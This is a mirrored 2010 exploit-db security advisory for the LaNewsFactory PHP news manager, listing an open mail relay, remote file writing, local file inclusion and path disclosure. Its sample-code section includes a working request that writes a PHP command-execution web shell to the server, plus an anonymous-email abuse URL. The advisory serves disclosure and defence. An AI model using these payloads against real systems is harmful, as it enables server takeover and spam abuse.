lanewsfactory – Multiple Vulnerabilities - 体验盒子

作者： Salvatore Fresta

日期： 2010-04-23

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12361/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

LaNewsFactory Multiple Remote Vulnerabilities

http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt

NameLaNewsFactory

VendorChristophe Brocas

Versions Affected <= 1.0.0

AuthorSalvatore Fresta aka Drosophila

Website http://www.salvatorefresta.net

Contact salvatorefresta [at] gmail [dot] com

Date2010-04-19

X. INDEX

I.ABOUT THE APPLICATION

II. DESCRIPTION

III.ANALYSIS

IV. SAMPLE CODE

V.FIX

VI. DISCLOSURE TIMELINE

I. ABOUT THE APPLICATION

Thisisavery usednews manager thatnot require a

database.

II. DESCRIPTION

This news managment is affectedby manyvulnerabilities

thatallowsaguesttowritearbitrary files on the

system, include local files, read local files etc..

III. ANALYSIS

Summary:

A) Anonymous email

B) Remote File Writing

C) Multiple Local File Inclusion

D) Full Path Disclosure

A) Anonymous email

The mailto.php file allows a guest to send arbitrary emails.

The input is not properly sanitised:

if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))

{

mail ($friendemail, $display[$lang]["mailtoafriend"],"$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");

B) Remote File Writing

The save-edited-news.phpfileallows a guest to write a

fileon thesystem.Thisvulnerability may be used to

execute remote commands on the system.

C) Multiple Local File Inclusion

There are many files that use a not sanitised input with

include PHP function. Thisvulnerabilitymay be used to

execute remote commands by including the Apache Log file.

D) Full Path Disclosure

Forexample, print.phpfileprintsmanyerrorsby

including the full path of the file.Thispathmaybe

very useful for local file inclusion and other.

IV. SAMPLE CODE

A) Anonymous email

mailto.php?friendemail=target@email.com&youremail=ano@email.com&comments=suck!

B) Remote File Writing to Remote Command Execution

save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>

D) Full Path Disclosure

print.php?art=-1.xml

V. FIX

No fix.

VIII. DISCLOSURE TIMELINE

2010-04-19 Bugs discovered

2010-04-19 Advisory released